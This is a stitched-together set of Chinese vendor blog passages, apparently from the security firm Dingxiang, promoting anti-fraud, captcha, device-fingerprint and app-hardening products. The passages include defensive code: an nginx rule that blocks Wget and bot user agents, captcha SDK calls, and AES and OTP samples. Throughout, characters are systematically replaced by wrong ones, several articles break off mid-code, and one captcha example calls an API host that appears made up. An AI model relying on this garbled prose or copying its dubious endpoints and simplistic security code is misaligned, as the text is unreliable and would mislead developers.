3、定期对业务大数据做深度开掘，通过关联网络技术发现潜在隐患和团伙，防备新的威逼攻打。 4、此外，实现线上平安经营策略和模型的迭代闭环。针对用户的投诉、举报、案件等反馈信息，联合积淀的业务数据和危险数据，将迭代的模型和危险名单，利用平安决策零碎中，实现残缺的业务闭环，不断完善平台的平安体系。 相干技术产品举荐1、顶象业务平安情报。顶象业务平安情报领有 30000+危险源，蕴含来自对黑灰产社区社群、暗网论坛、守法违禁网站和App的监测，以及打码平台、众包平台、行业非危险数据的共享等。基于对危险数据的人群画像、行为评分、关联关系剖析、团伙欺诈开掘、场景危险特征分析，以及专家业余教训的判断和定位后，提炼总结剖析出电信欺骗危险、IP地址危险、设施危险、涉毒涉诈危险、交易危险以及不同行业危险的业务平安情报，为平安人员提供及时、精确、无效的情报内容，帮忙平安人员零碎掌握业务平安态势、威逼门路、影响范畴等，剖析挖掘出攻打特色、潜在隐患，从而及时无效晋升平安应急响应能力，制订迷信无效的防控策略。 2、顶象智能验证码。顶象无感验证以进攻云为外围，集13种验证形式，多种防控策略，以智能验证码服务、验证决策引擎服务、设施指纹服务、人机模型服务为一体的云端交互平安验证零碎。其会集了4380条危险策略、112类危险情报、笼罩24个行业、118种危险类型，防控精准度>99.9%，1天内便可实现从危险到情报的转化，行业危险感知能力实力增强，同时反对平安用户无感通过，实时反抗处理能力更是缩减至60s内。 3、顶象端加固。作为顶象进攻云的一部分，顶象端加固反对安卓、iOS、H5、小程序等平台，独有云策略、业务平安情报和大数据建模。基于进攻云，顶象端加固可能为App提供挪动利用运行进行平安监测，对挪动利用运行时终端设备、运行环境、操作行为进行实时监测，帮忙App建设运行时危险的监测、预警、阻断和溯源平安体系。 4、顶象设施指纹。作为顶象进攻云的一部分，顶象设施指纹集成了业务平安情报、云策略和数据模型，通过用户上网设施的硬件、网络、环境等特色信息生成设施的惟一标识，笼罩安卓、iOS、H5、小程序，可无效辨认模拟器、刷机改机、Root、越狱、劫持注入等危险，做到无效监控和拦挡。 5、顶象风控引擎。顶象Dinsight实时风控引擎能够在营销流动、领取下单、信贷申请等场景，对业务前端发送的申请进行危险判断，并于毫秒内返回决策后果，以晋升业务系统对危险的防控能力。日常风控策略的均匀处理速度仅需20毫秒，聚合数据引擎，集成专家策略，反对对现有风控流程的并行监测、替换降级，也可为新业务构建专用风控平台；聚合反欺诈与风控数据，反对多方数据的配置化接入与积淀，可能进行图形化配置，并疾速利用于简单策略与模型；可能基于成熟指标、策略、模型的教训储备，以及深度学习技术，实现风控自我性能监控与自迭代的机制；集成专家策略，基于零碎+数据接入+指标库+策略体系+专家施行的实战；反对对现有风控流程的并行监测、替换降级，也可为新业务构建专用风控平台。 6、顶象模型平台。基于关联网络和深度学习技术的Xintell智能模型平台，联合Hadoop生态和自研组件，将简单的数据处理、开掘、机器学习过程标准化，提供从数据处理、特色衍生、模型构建到最终模型上线的一站式建模服务，联合利落拽式操作大幅升高建模门槛，晋升建模工程师、数据科学家的工作效率，让经营人员和业务人员也能间接上手操作实际，帮忙企业通过对大数据的模型训练在反欺诈、风控、营销、客户分群等场景提供模型反对，并可能依据工夫变动进行动静降级与优化，极大升高建模和模型治理门槛。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

常见的刷流量伎俩目前不论是集体开发者还是企业，App推广目前都是必要的伎俩，然而在推广过程中，或因为推广提供的优惠，或推广的渠道个性，必然或多或少会带来肯定的广告舞弊。以刷量为例，常见的舞弊伎俩有以下几种 （ChatGPT列举）： 1. 主动点击： 通过程序或脚本主动模仿用户点击广告，以减少广告点击量。 2. 主动下载和装置： 通过自动化脚本或恶意软件，在用户不知情的状况下主动下载和装置应用程序，以获取装置量和激活量。 3. 人工点击： 雇佣人力点击广告，通过低成本的人工劳动力刷取广告点击量。 4. IP代理和虚构公有网络（VPN）： 应用IP代理或VPN服务来暗藏实在IP地址，以刷取虚伪的广告流量。 5. 刷量替换： 进行刷量替换，即多个广告主之间相互点击广告，以减少彼此的点击量。 6. 黑帽SEO： 通过不合乎搜索引擎标准的优化伎俩，进步网站在搜寻后果中的排名，从而获取更多的流量。 7. 强制重定向： 通过恶意代码或程序，将用户重定向到广告页面或歹意网站，以获取流量和点击量。 8. 机器人流量： 应用自动化程序或机器人模仿实在用户行为，刷取广告流量。 9. 混充用户和账号： 创立大量混充的用户账号或社交媒体账号，通过这些账号来点击广告或转发链接，以减少流量。 基于下面这些伎俩，咱们该如何防备呢？ 防备伎俩从防备伎俩来看，个别有两种，一种是从技术上，第二种是推广机制上，咱们两种都讲一讲（会蕴含简略的代码示例局部）： 1. 用户验证： 应用程序能够应用各种形式对用户进行验证，例如应用手机号码、电子邮件或社交媒体账号进行登录，以确保每个用户都是实在存在的。 # 应用手机号码进行用户验证def verify_user(phone_number): # 调用短信验证接口发送验证码到用户手机 # 用户输出验证码进行验证 # 验证通过返回 True，否则返回 False pass这里的代码非常简单，如果有须要更简单以及多重验证伎俩，能够看看我往期的文章，或者间接返回顶象去注册应用收费的：顶象验证码 2. 设施指纹识别： 通过采集设施的惟一特色信息，如设施型号、操作系统版本、IP地址等，能够对设施进行辨认和跟踪，以检测异样行为和舞弊行为。 import hashlibimport platform# 生成设施的惟一指纹def generate_device_fingerprint(): device_info = platform.platform() + platform.machine() + platform.node() device_fingerprint = hashlib.md5(device_info.encode()).hexdigest() return device_fingerprint黑灰产领有业余的设施牧场，通过应用模拟器、刷机改机等伎俩，批量、重复地利用终端设备作案。对互联网场景下的金融、电商等行业，进行歹意爬取、虚伪注册、账号盗用、薅羊毛、推广舞弊等其余歹意行为，而设施指纹通过用户上网设施的硬件、网络、环境等特色信息生成设施的惟一标识，可无效辨认模拟器、刷机改机、Root、越狱、劫持注入等危险。 下面的代码也只是一个非常简单的示例，具体的能够看往期的文章，或者去顶象试用他们的设施指纹：顶象设施指纹 3. 反欺诈算法： 利用机器学习和数据分析技术，开发反欺诈算法来检测异样的流量模式和行为，辨认潜在的舞弊行为。 ...

为了更好地反馈用户，晋升用户体验，云鲨RASP特推出《深度体验——有奖征文》流动。Cherry机械键盘、Beats耳机、雷蛇鼠标等,丰盛大奖等你来拿！更有入驻RASP名人堂，提前享受会员权利等福利，具体细节如下： 流动工夫：即日起至2023年6月17日 流动对象：所有云鲨RASP的注册用户 流动福利： 其余权利： 参加形式：登录官网 https://rasp.xmirror.cn，注册用户即可参加流动 内容要求：a、文章题目格局：《云鲨RASP征文活动——xxx》b、文章内容：围绕如何应用RASP进行利用平安防护，蕴含但不限于利用场景、装置探针、心得体验等 （点击原文，登录官网）c、投稿内容要求合乎征稿主题、合乎法律规定、要求500字以上d、须要实在应用云鲨RASP产品，产出有价值文章或心得 评分维度：构造完整性：内容构造残缺，符合要求，图文并茂内容典型性：内容有深度，体现出对于RASP的产品应用价值 投稿形式：增加小助手微信：rasp_xuanjing，征询更多流动细节并投稿

客户始终在杠遇到客户App Store审核4.3的时候，咱们个别会提供加固来解决这个问题。这个时候，会有“略懂”的客户反驳一句： 代码混同只是升高了可读性，安全性并没有失去本质晋升！这个问题咱们要如何答复呢？ 客户关怀的是老本在客户问进去这个问题的时候，咱们其实心里要无数，因为客户对“代码混同”的概念只知其一;不知其二，而这，正好是咱们通过咱们的业余拿下客户的好时机。 “平安无相对”。首先咱们要解释的是这个概念AIGC让咱们看到平安的有限可能（比方在验证码的利用），同时也会让黑灰产们看到技术倒退带来的主观利益。平安世界就是这样，此消彼长。所以，只有绝对的平安。而这“绝对的平安”，就须要在 客户的老本和黑灰产的老本之间均衡。 而代码混同，就是进步黑灰产攻打老本的最佳办法之一。 代码混同的具体性能1.暗藏程序逻辑：代码混同不仅仅是将类名、字段和办法改短，它还通过重组和批改代码构造来暗藏程序的逻辑。这使得歹意用户更难了解和剖析应用程序的外部工作原理，从而减少了逆向工程的难度。举个简略的例子：原始代码： public class Example { private String password = "secretpassword"; public void login(String input) { if (input.equals(password)) { System.out.println("Login successful"); } else { System.out.println("Login failed"); } }}混同后的代码： public class A { private String a = "b"; public void c(String d) { if (d.equals(a)) { System.out.println("e"); } else { System.out.println("f"); } }}2.进步反编译难度：代码混同技术通常会利用一系列转换和变换，如代码重排、增加无意义代码和控制流混同等，以减少反编译的难度。这些技术使得逆向工程师更难以还原源代码，并且他们须要破费更多的工夫和精力来了解程序的构造和性能。 以上面代码为示例：混同前： def foo(): a = 1 if a == 1: b = 2 else: b = 3 c = a + b return c混同后：1）控制流平坦化 ...

近日，广东省自然资源厅审批通过了如祺出行提交的测绘资质申请，如祺出行取得地理信息系统工程和互联网地图服务两个业余的乙级测绘资质。此次获批意味着，如祺出行可能在许可区域内依法合规发展数据标注和场景仿真等相干业务，构建全凋谢的 L4 级主动驾驶经营体系，并踊跃布局主动驾驶汽车产业链，推动可商业化的主动驾驶解决方案落地利用。 品质为先，让服务成为标杆2019年6月26日正式上线的如祺出行，以“涟漪模式”深耕粤港澳大湾区，稳步推动在广州、佛山、珠海、深圳、东莞、中山等城市的布局，在大湾区外围城市用户渗透率已超30%。涵盖如祺慢车、如祺企业用车、如祺逆风车、如祺车服、如祺Robotaxi共五大板块，构建了立体化的出行生态。截至2022年5月，如祺出行平台用户规模冲破1500万。 不同于疯狂烧钱扩张的网约车，如祺出行器重服务与品质。为了保障促销流动进行。如祺出行部署顶象无感验证，用于新人劵、周末打折券等各类促销流动中。无感验证可能依据用户的行为和设施信息，疾速精确地区分操作者是人还是机器，及时甄别出羊毛党的机器账号，实时监控并拦挡歹意行为，可能无效避免羊毛党刷单、哄抢等行为，防止大量机器账号的歹意攻打，保障真正消费者的权利。 网约车不仅是出行行业，更是服务性行业，作为近距离直面用户的服务者，网约车司机的集体素质、服务水平等间接关系到乘客的乘车体验，更间接影响公司及行业形象。为此，如祺出行专门成立“如祺学院”，从源头把控司机服务品质。在司机方面，如祺严格依照国家有关规定进行司机准入认证，并率先公布行业“干净服务规范”，从空间、司机、服务、车型等四大维度打造网约车服务的一种新标杆。 如祺出行保持合规经营，不断创新服务管控机制，从源头把控服务品质，以技术赋能继续打造平安、衰弱、优质的出行服务。据中国交通运输部颁布的数据，如祺出行2022年5月份订单合规率位居全国第一。而在2021年，如祺出行月度订单合规率5次排名全国第一，领跑行业合规倒退。 科技助力，迈向将来出行2022年以来，如祺出行先后推出了国内首个全开放性Robotaxi经营科技平台、Robotaxi经营监管平台，与广汽研究院以及小马智行、文远知行等多家主动驾驶公司实现零碎和数据对接；上线了Robotaxi车辆管理系统，全方位保障所有接入平台的Robotaxi车辆经营稳定性和经济性最大化。　2022年10月，如祺出行在广州南沙开启有人驾驶车辆与无人驾驶车辆混合经营，承接用户实在出行需要，成为粤港澳大湾区首个实现Robotaxi混合经营的出行平台，向Robotaxi商业化经营落地迈出重要一步。随着近日获批在广州发展智能网联汽车示范经营资格，如祺出行已在广州南沙开启有人驾驶车辆与无人驾驶车辆混合经营，减速迈向将来出行。 在近日举办的“2023寰球独角兽CEO大会”上，如祺出行入选胡润百富《2023寰球独角兽榜》企业。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

验证码攻防反抗的实质短信验证码和图片验证码的区别就不用说了，大家都晓得。 在答复后面的问题前，咱们须要晓得反抗的实质： 黑灰产如果想破解图片验证码（前面说的“验证码”，都指的是“图片验证码”），首先第一步，要实现“辨认”这个能力，也就是，它须要有能力晓得这张图片上的答案指标在哪里。在这块，咱们说的“辨认反抗”的实质就是咱们反抗黑灰产的工具。 实际上，真正的从技术底层上来说，验证码反抗的是黑灰产的人工智能，反抗的是卷积神经网络技术。在咱们晓得这个实质之后，咱们的验证码从哪些点去做更新、做迭代，能力无效地去反抗它。 如果要防备黑灰产，那么网站须要在感知层面进行增强，而感知层面，只有图片验证码能力实现，因为感知层面包含五个维度： 行为数据：验证过程中产生的键盘/鼠标/触屏等行为数据 终端危险：异样设施环境，模拟器、自动化工具，无头浏览器等 数据统计：各种验证形式的通过率，失败率，调用量 安全策略：检测攻击行为的安全策略，并能依据危险状况对验证码做出调整 预警指标：各维度的指标计算，监督每种验证形式的攻防状况 而这五个维度如何体现在验证码上呢？ 这个就是图片验证码的“变” ： 图片验证码的“变”1.动静变更前端加密算法 在平安通信模块，黑灰产在破解验证码的时候，其可能会首要去思考逆向网站的JS 、晓得通信协议以及参数获取，这是攻防反抗比拟重要的一环。 解决方案的话，能够在进攻云搁置一个平安加密核心，而平安加密核心会定期地、自动化地生成新的加密算法，把代码从新混同一遍，而后定期推送到CDN下面。CDN下面搁置的是验证码以及验证的JS文件，而这，次要是由客户端来加载。在这种动静更新的机制之下，即便黑灰产获取到某个版本的验证码JS文件，并做了逆向破解之后，会在下一个更新窗口到来之后生效。如果黑灰产想实现齐全的脱机运行，就须要继续地去更新，去破解这些JS。这对于黑灰产来说，老本极高。 2.图片变更 图片的变更如何联合AIGC的能力，变动万千 3.字体及成果的变更 除上述之外，就是验证元素的治理。验证码领有继续变更的能力，能够动静的去更新这些根底元素。这里的“根底元素”，次要是字体的成果和字体的变动。 4.其余成果的变更 包含图标元素的变更、验证形式动静装置卸载、验证码形式和组合的实时变动等等 综上来说，只管短信验证码提供了肯定的安全性，但图片验证码能够进一步避免恶意程序或机器人的攻打。 图片验证码通常要求用户正确地辨认和输出一个难以辨认的图像中的文字或数字。这样的图像对于机器学习算法和自动化脚本来说比拟艰难，因而能够无效地区分人类用户和自动化程序。 示例代码import requests# 配置顶象的密钥和验证码IDDOOV_API_KEY = 'your_doov_api_key'CAPTCHA_ID = 'your_captcha_id'# 申请验证码def get_captcha(): url = 'https://doovos.dooioo.com/captcha/preCaptcha' payload = { 'captchaId': CAPTCHA_ID } headers = { 'Content-Type': 'application/json', 'Authorization': 'Bearer {}'.format(DOOV_API_KEY) } response = requests.post(url, json=payload, headers=headers) result = response.json() return result['captchaImage']# 验证用户输出的验证码def verify_captcha(captcha_token, captcha_text): url = 'https://doovos.dooioo.com/captcha/verifyCaptcha' payload = { 'captchaId': CAPTCHA_ID, 'captchaToken': captcha_token, 'captchaText': captcha_text } headers = { 'Content-Type': 'application/json', 'Authorization': 'Bearer {}'.format(DOOV_API_KEY) } response = requests.post(url, json=payload, headers=headers) result = response.json() return result['success']# 获取验证码图片并显示给用户captcha_image = get_captcha()print('验证码图片链接:', captcha_image)# 假如用户在表单中输出了验证码文本和验证码令牌user_captcha_text = input('请输出验证码文本: ')user_captcha_token = input('请输出验证码令牌: ')# 验证用户输出的验证码verification_result = verify_captcha(user_captcha_token, user_captcha_text)if verification_result: print('验证码验证胜利')else: print('验证码验证失败')依据不同的编程语言当然会有不同的实现形式，下面是python的示例。不过下面应用的是顶象的验证码库，应用之前，须要先注册顶象的服务并获取相应的API密钥和验证码ID。将示例代码中的"your_doov_api_key"和"your_captcha_id"替换为你本人的值。 ...

顶象联结中国信通院公布的《业务平安白皮书—数字业务危险与平安》显示，随着数字化的倒退，企业的要害数据、用户信息、基础设施、经营过程等均处于边界含糊且日益凋谢的环境中，波及利益流和高附加值的业务面临多样的安全隐患；同时，以大规模牟利为目标网络黑灰产，相熟业务流程以及防护逻辑，可能纯熟使用自动化、智能化的新兴技术，一直开发和优化各类攻打工具。 国内数字化转型及数字化原生企业，将长期面临业务欺诈的严厉挑战，企业的业务平安体系建设更须要思考如下四个问题。 第一，业务场景丰盛，应用环境繁冗，企业对业务危险与业务平安的认知不够，不足专业人才。 第二，业务危险复杂多变，已知的防控伎俩难以防控最新的业务危险，无奈从全局视角洞察欺诈危险。 第三，单点进攻作战能力无奈应答全网随时呈现的攻打，传统平安机制和经营思路也不适应新环境下产生的威逼。 第四，业务平安须要须要以业务为核心，企业基于业务需要和行业特色构建平安体系。 作为平安服务中最贴近业务、最间接面向用户外围价值的平安维度，企业需构建一个提供全流程防护，可能满足不同业务场景，领有各行业策略且可能基于本身业务特点实现积淀和更迭演进的业务平安，为不同业务场景提供平安防护，以无效抵挡业务欺诈威逼，解决各个业务环节的平安问题，为业务的稳固、平安运行保驾护航。 “五位一体”的业务平安体系平安是一个动静的、全过程的保障，繁多环节无奈无效防护。随着危险威逼的瞬息万变，企业须要建设一个笼罩全流程、多场景的、层层递进的、塔防式的防护体系。因而，一个残缺的业务平安体系蕴含数据、特色、策略、模型、经营，五位一体，缺一不可。 第一道防线，数据。拦挡已知的危险名单，间接过滤已知危险。数据蕴含情报、IP黑名单、设施黑名单、手机号码黑名单、账户黑名单等信息，次要用于提供无效的数据校验。通过对所采集到的数据进行剖析和解决，间接辨认拦挡异样、可疑操作账户等。 第二道防线，特色。通过全链路的产品，剖析操作者行为、习惯、环境、设施等，发现异常行为和异样特色。特色蕴含设施属性、操作行为、环境属性、网络属性等信息，次要用于提供特色辨认校验。通过对用户行为和环境等特色进行剖析，能够辨认出异样或者可疑的行为，从而进步零碎的平安防护能力。 第三道防线，策略。基于风控引擎产品，配置的规定、策略，发现和拦挡异样行为。策略蕴含业务规定、监控预警、办法等信息，次要用于提供教训校验。通过制订正当的危险规定和监控预警机制，提供无效地危险防范措施。 第四道防线，模型。基于业务数据和危险数据构建专属模型，开掘潜在危险。模型基于大数据和人工智能技术构建，次要是人工智能的校验。通过使用机器学习和数据挖掘等技术，能够对数据进行精细化剖析和建模，从而挖掘出各类危险行为，并进行实时预测和回应。 第五道防线，经营。通过人工经营、专家教训，发现技术的有余和空白点，监督业务平安整个流程。经营次要是人工运维，提供专家校验。通过运维人员的专业技能和丰盛教训，能够及时发现和解决各种平安问题，保障系统的失常运行和业务平安。 顶象的五道平安防线产品数据防线——业务平安情报。行将推出的顶象业务平安情报，领有 30000+危险源，蕴含来自对黑灰产社区社群、暗网论坛、守法违禁网站和App的监测，以及打码平台、众包平台、行业非危险数据的共享等。基于对危险数据的人群画像、行为评分、关联关系剖析、团伙欺诈开掘、场景危险特征分析，以及专家业余教训的判断和定位后，提炼总结剖析出电信欺骗危险、IP地址危险、设施危险、涉毒涉诈危险、交易危险以及不同行业危险的业务平安情报，为平安人员提供及时、精确、无效的情报内容，帮忙平安人员零碎掌握业务平安态势、威逼门路、影响范畴等，剖析挖掘出攻打特色、潜在隐患，从而及时无效晋升平安应急响应能力，制订迷信无效的防控策略。 特色防线——设施指纹+APP加固+验证码。顶象App加固反对安卓、iOS、H5、小程序等平台，独有云策略、业务平安情报和大数据建模。基于进攻云，顶象端加固可能为App提供挪动利用运行进行平安监测，对挪动利用运行时终端设备、运行环境、操作行为进行实时监测，帮忙App建设运行时危险的监测、预警、阻断和溯源平安体系。 顶象设施指纹通过用户上网设施的硬件、网络、环境等特色信息生成设施的惟一标识，笼罩安卓、iOS、H5、小程序，可无效辨认模拟器、刷机改机、Root、越狱、劫持注入等危险，做到无效监控和拦挡。 顶象无感验证集13种验证形式，多种防控策略，以智能验证码服务、验证决策引擎服务、设施指纹服务、人机模型服务为一体的云端交互平安验证零碎。会集了4380条危险策略、112类危险情报、笼罩24个行业、118种危险类型，防控精准度>99.9%，1天内便可实现从危险到情报的转化，行业危险感知能力实力增强，同时反对平安用户无感通过，实时反抗处理能力更是缩减至60s内。 策略防线——风控引擎。顶象Dinsight实时风控引擎能够在营销流动、领取下单、信贷申请等场景，对业务前端发送的申请进行危险判断，并于毫秒内返回决策后果，以晋升业务系统对危险的防控能力。日常风控策略的均匀处理速度仅需20毫秒，聚合数据引擎，集成专家策略，反对对现有风控流程的并行监测、替换降级，也可为新业务构建专用风控平台；聚合反欺诈与风控数据，反对多方数据的配置化接入与积淀，可能进行图形化配置，并疾速利用于简单策略与模型；可能基于成熟指标、策略、模型的教训储备，以及深度学习技术，实现风控自我性能监控与自迭代的机制；集成专家策略，基于零碎+数据接入+指标库+策略体系+专家施行的实战；反对对现有风控流程的并行监测、替换降级，也可为新业务构建专用风控平台。 模型防线——模型平台。基于关联网络和深度学习技术的Xintell智能模型平台，联合Hadoop生态和自研组件，将简单的数据处理、开掘、机器学习过程标准化，提供从数据处理、特色衍生、模型构建到最终模型上线的一站式建模服务，联合利落拽式操作大幅升高建模门槛，晋升建模工程师、数据科学家的工作效率，让经营人员和业务人员也能间接上手操作实际，帮忙企业通过对大数据的模型训练在反欺诈、风控、营销、客户分群等场景提供模型反对，并可能依据工夫变动进行动静降级与优化，极大升高建模和模型治理门槛。 经营防线——业务平安经营。行将正式上线，敬请放弃关注。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

跨境电商行业前景家喻户晓，2022年以来，寰球经济在疫情下增长放缓，不确定性减少，叠加海内受通货膨胀、汇率浮动等因素，局部品类的生产需要削弱。并且，寰球能源缓和问题导致原材料价格上涨，企业生产成本进步，国际化生产和贸易因素老本也持续上升，一直压缩着进口企业的利润空间。因而，不少人都对中国进口跨境电商产业抱以乐观和摇晃的态度。 然而，《白皮书》强调，据海关总署公布的数据显示，2022年1-8月我国进口贸易额为15.48万亿元，同比增长14.2%，保持良好倒退态势，是推动上半年GDP增长的重要力量。其中民营企业进口增长展示了极大的生机，在进口外贸中的占比由2012年的37.6%，升至往年截至8月的60%。2017到2021年，我国进口跨境电商规模以年均匀约40%的速度高速增长，是外贸出口增速的4倍多。这些数据表明了中国出海企业在面对这一风云变幻的新局势时，整体展现出极强的韧性和生机，放弃着稳固的增长态势。（数据起源：《2022中国进口跨境电商产业集群倒退白皮书》） 商家遭逢到的两类跨境领取欺诈国外尤其是美国的信用卡业务呈现十分早，倒退的也很欠缺，信用卡领取比重也十分高。在跨境电商服务中均为无卡交易，消费者购买商品后，只须要输出括卡号、有效期，三位CVV等信息即可实现付款，无需明码。该类领取会晋升订单交易成功率，毛病就是歹意拒付、欺诈交易的危险比拟高。 第一类，盗卡交易欺诈。 欺诈者购买商品后，应用盗取的卡片信息进行领取。当失主在发现自己的卡片被盗刷后会致电银行撤销交易，并对交易进行拒付。而此时商家已将商品发送给购买者，由此面临钱货两空的情景。 第二类，退款领取欺诈。 欺诈者购买且收到商品后，却以商品未收到或商品损坏为由向银行提出异议，启动退款流程，商家同样面临钱货两空的情景。 无论是盗卡交易欺诈还是退款领取欺诈，都会给商家带来钱货两空的损失。而且当拒付欺诈率达到肯定阈值时，商家还会蒙受银行的处罚，给商户信用带来更大损失。严重者，还会导致商家应用的第三方领取账号解冻甚至封号，这意味着商家无奈再利用这个渠道进行任何跨境销售，这将间接导致品牌出海碰壁甚至威逼整个公司的生存。 商家应如何保障订单安全性？应答日趋简单的跨境领取环境，商家须要制订松紧切当的风控防备机制，优化购物用户的身份验证机制，做好领取行为的监控，部署业余的风控产品，并做好各种应答预案，防备可能存在的交易欺诈危险。 1.加密技术： 应用加密技术能够爱护领取信息在传输过程中的安全性。跨境电商平台能够采纳安全套接层（SSL）或传输层平安（TLS）协定，对数据进行加密，避免黑客截取和篡改领取信息。 from Crypto.Cipher import AESdef encrypt_data(data, key): cipher = AES.new(key, AES.MODE_EAX) ciphertext, tag = cipher.encrypt_and_digest(data) return ciphertext, tag, cipher.noncedef decrypt_data(ciphertext, tag, nonce, key): cipher = AES.new(key, AES.MODE_EAX, nonce) data = cipher.decrypt_and_verify(ciphertext, tag) return data# 示例用法key = b'0123456789ABCDEF' # 密钥，16字节data = b'This is a secret message.'encrypted_data, tag, nonce = encrypt_data(data, key)decrypted_data = decrypt_data(encrypted_data, tag, nonce, key)print(decrypted_data)2.双因素认证： 为了减少领取环节的安全性，能够引入双因素认证机制。除了输出明码，用户还需提供其余身份验证信息，如手机验证码、指纹识别或一次性明码（OTP），以确保领取账户的合法性。 import pyotp# 生成OTP密钥otp_secret = pyotp.random_base32()# 生成OTP验证URLotp_url = pyotp.totp.TOTP(otp_secret).provisioning_uri(name='Alice', issuer_name='MyApp')# 校验OTPdef verify_otp(otp_secret, user_otp): totp = pyotp.TOTP(otp_secret) return totp.verify(user_otp)# 示例用法user_otp = '123456' # 用户输出的OTPis_valid = verify_otp(otp_secret, user_otp)print(is_valid)另外再附一个应用指纹识别传感器和操作系统的API进行交互 ...

github demo地址https://github.com/dingxiangtech/captcha-demo captcha-demo1、验证码工作流程 2、demo运行captchaUIdemo文件夹阐明 ：模仿了web端登录流程接入验证码的场景，对应图中的验证码初始化和验证码验证两个阶段 应用流程 ： 下载该文件夹到电脑中，下载实现后，文件夹的内容如下图所示： 关上js文件夹中的config.js文件，批改其中的appId配置，appId配置能够在顶象控制台利用治理或利用配置模块获取 批改结束后点击保留。captchaJavaDemo文件夹阐明 ：模仿了后盾业务流程接入验证码的场景，次要是模仿登录场景下的验证码token验证，对应业务申请携带验证码平安凭据和验证码平安凭据核验两个步骤 应用流程 ： 下载该文件夹到电脑中，下载实现后，文件夹的内容如下图所示： 将我的项目导入至IDEA中，期待IDEA把我的项目加载结束，编辑CaptchaService类，批改其中appId和appSecret的值 批改后点击保留，在IDEA中运行这个springboot我的项目。运行胜利如下图所示： 关上index.html在浏览器中关上 captchaUIdemo 文件夹中的index.html文件，如下图所示： 输出用户名和明码后，点击登录，会弹出验证码进行验证 验证通过后，会提醒登录胜利 留神：其中两个我的项目中的appid都须要做批改，appid和appsecret能够通过顶象控制台的产品治理进行获取。 3、更多集成阐明其余各个语言和各个端的具体配置和接入流程能够参考顶象官网验证码用户手册：https://www.dingxiang-inc.com/docs/detail/captcha 4、应用问题集成或应用中遇到问题，能够查问或提交issues 欢送fork或者star~

前言验证码是阻挡机器人攻打的无效实际，网络爬虫，又被称为网络机器人，是依照肯定的规定，主动地抓取网络信息和数据的程序或者脚本。如何防控，这里简略提供几个小Tips。 应用nginx的自带性能通过对httpuseragent阻塞来实现，包含GET/POST形式的申请，以nginx为例。回绝以wget形式的httpuseragent，减少如下内容： Block http user agent - wgetif ($http_user_agent ~* (Wget) ) { return 403;}如何回绝多种httpuseragent，内容如下： if ($http_user_agent ~ (agent1|agent2|Foo|Wget|Catall Spider|AcoiRobot) ) { return 403;}限度User-Agent字段User-Agent字段能辨认用户所应用的操作系统、版本、CPU、浏览器等信息，如果申请来自非浏览器，就能辨认其为爬虫，阻止爬虫抓取网站信息。 限度IP或账号依据业务需要，要求用户通过验证码后能力应用某些性能或权限。当同一IP、同一设施在肯定工夫内拜访网站的次数，零碎主动限度其拜访浏览。只有在输出正确的验证码之后能力持续拜访。 验证码拦挡在登录页等页面，增加验证码，以辨认是失常流量还是歹意爬虫，也是一种根本的操作。 HTML代码： <script src="captcha.js?appid=xxx"></script><script>kg.captcha({ // 绑定元素，验证框显示区域 bind: "#captchaBox3", // 验证胜利事务处理 success: function(e) { console.log(e); document.getElementById('kgCaptchaToken').value = e['token'] }, // 验证失败事务处理 failure: function(e) { console.log(e); }, // 点击刷新按钮时触发 refresh: function(e) { console.log(e); }});</script><div id="captchaBox3">载入中 ...</div><input type="hidden" name="kgCaptchaToken" value="" />Python代码： from wsgiref.simple_server import make_serverfrom KgCaptchaSDK import KgCaptchadef start(environ, response): # 填写你的 AppId，在利用治理中获取 AppID = "xxx" # 填写你的 AppSecret，在利用治理中获取 AppSecret = "xxx" request = KgCaptcha(AppID, AppSecret) # 填写应用服务域名，在利用治理中获取 request.appCdn = "https://cdn.kgcaptcha.com" # 申请超时工夫，秒 request.connectTimeout = 10 # 用户id/登录名/手机号等信息，当安全策略中的防控等级为3时必须填写 request.userId = "kgCaptchaDemo" # 应用其它 WEB 框架时请删除 request.parse，应用框架提供的办法获取以下相干参数 parseEnviron = request.parse(environ) # 前端验证胜利后颁发的 token，有效期为两分钟 request.token = parseEnviron["post"].get("kgCaptchaToken", "") # 前端 _POST["kgCaptchaToken"] # 客户端IP地址 request.clientIp = parseEnviron["ip"] # 客户端浏览器信息 request.clientBrowser = parseEnviron["browser"] # 去路域名 request.domain = parseEnviron["domain"] # 发送申请 requestResult = request.sendRequest() if requestResult.code == 0: # 验证通过逻辑解决 html = "验证通过" else: # 验证失败逻辑解决 html = f"{requestResult.msg} - {requestResult.code}" response("200 OK", [("Content-type", "text/html; charset=utf-8")]) return [bytes(str(html), encoding="utf-8")]httpd = make_server("0.0.0.0", 8088, start) # 设置调试端口 http://localhost:8088/httpd.serve_forever()最初SDK开源地址：https://github.com/KgCaptcha，顺便做了一个演示：https://www.kgcaptcha.com/demo/ ...

前言：明天是星期一，大家都应该晓得，这种日子，出于人道主义和人体结构，是不应该工作的。 我的左半脑还沉迷在周末的高兴之中，右半脑在为接下来五天而发愁。所以，来写篇短文摸个鱼吧。 设施指纹定义设施指纹通过用户上网设施的硬件、网络、环境等特色信息生成设施的惟一标识，可无效辨认模拟器、刷机改机、Root、越狱、劫持注入等危险。就设施指纹的发展史来看，设施指纹从原来的IP到当初的设施指纹，其中的技术和安全性都有很大的进步。 获取原理获取设施指纹的原理是利用设备的各种属性和特色，包含硬件、操作系统、网络设置、浏览器配置和插件等信息，对设施进行唯一性的标识和辨认。 设施指纹获取原理是基于设施自身的属性和特色来实现的，因而能够在不依赖用户身份信息的状况下，对设施进行唯一性的标识和辨认，利用于广告追踪、反欺诈、用户行为剖析等畛域。 通常来说，个别会波及到以下步骤： 1.收集设施信息：收集与设施相干的各种信息，包含硬件信息（如CPU、GPU、内存、存储器等）、操作系统信息（如操作系统版本、语言、时区等）、浏览器信息（如用户代理字符串、插件、字体等）以及网络信息（如IP地址、DNS设置等）等。 2.加工信息：将收集到的设施信息进行解决和加工，提取设施的特色和属性，如操作系统位数、浏览器版本、屏幕分辨率、插件列表、语言设置等等。 3.生成设施指纹：依据加工后的设施信息，生成设施指纹，并将其存储到服务器或本地数据库中，用于后续的设施辨认和跟踪。 4.设施指纹更新：设施指纹可能会因为硬件或软件的变动而发生变化，因而须要定期更新和验证设施指纹，以确保设施的唯一性和准确性。 具体代码实现import hashlibimport jsonimport os# 收集设施信息def collect_device_info(): info = {} info['platform'] = os.name info['hostname'] = os.uname()[1] info['os'] = os.uname()[0] + ' ' + os.uname()[3] info['browser'] = 